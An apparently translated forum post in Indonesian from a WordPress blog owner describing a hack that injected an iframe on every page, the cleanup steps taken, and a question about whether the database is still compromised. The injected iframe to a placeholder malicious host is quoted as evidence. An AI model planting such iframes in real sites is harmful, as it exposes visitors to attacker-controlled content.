Blog WordPress for-fun saya di http://fakeplasticrock.com (menjalankan WordPress 3.1.1) diretas - itu menunjukkan <iframe>
pada setiap halaman seperti:
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Saya melakukan yang berikut
- Diupgrade ke 3.1.3 melalui sistem peningkatan WordPress bawaan
- Menginstal Exploit Scanner (banyak peringatan penting pada file yang tidak biasa) dan AntiVirus (ini menunjukkan semua hijau dan bersih, jadi saya menghapus dan menghapusnya setelah menjalankan)
- Mengubah kata sandi MySQL.
- Mengubah semua kata sandi pengguna WordPress.
- Terhubung melalui FTP dan mengunduh seluruh sistem file (tidak besar, ini adalah host bersama Linux WordPress saja)
- Menyebarkan sistem file terhadap ZIP resmi WordPress 3.1.3 dan menghapus atau menimpa apa pun yang tidak cocok.
Saya cukup yakin itu
- semua file pada disk adalah file WordPress 3.1.3 resmi
- tidak ada file "ekstra" pada disk selain yang saya
/theme
miliki, plugin Exploit Scanner (yang baru saja saya unduh),/uploads
folder, dan beberapa file kecil lainnya yang diharapkan. Plugin saya yang lain, wp-recaptcha, cocok dengan versi resmi yang diunduh saat ini. - Saya juga memeriksa
.htaccess
file dan tidak ada yang salah di sana
Saya tidak menyentuh basis data , tetapi saya berjuang untuk memikirkan bagaimana segala sesuatu di dalam basis data dapat berbahaya tanpa kode PHP khusus untuk membuatnya berfungsi?
Blog WordPress saya muncul OK dan bebas hack sekarang (saya pikir), tetapi apakah ada hal lain yang harus saya periksa?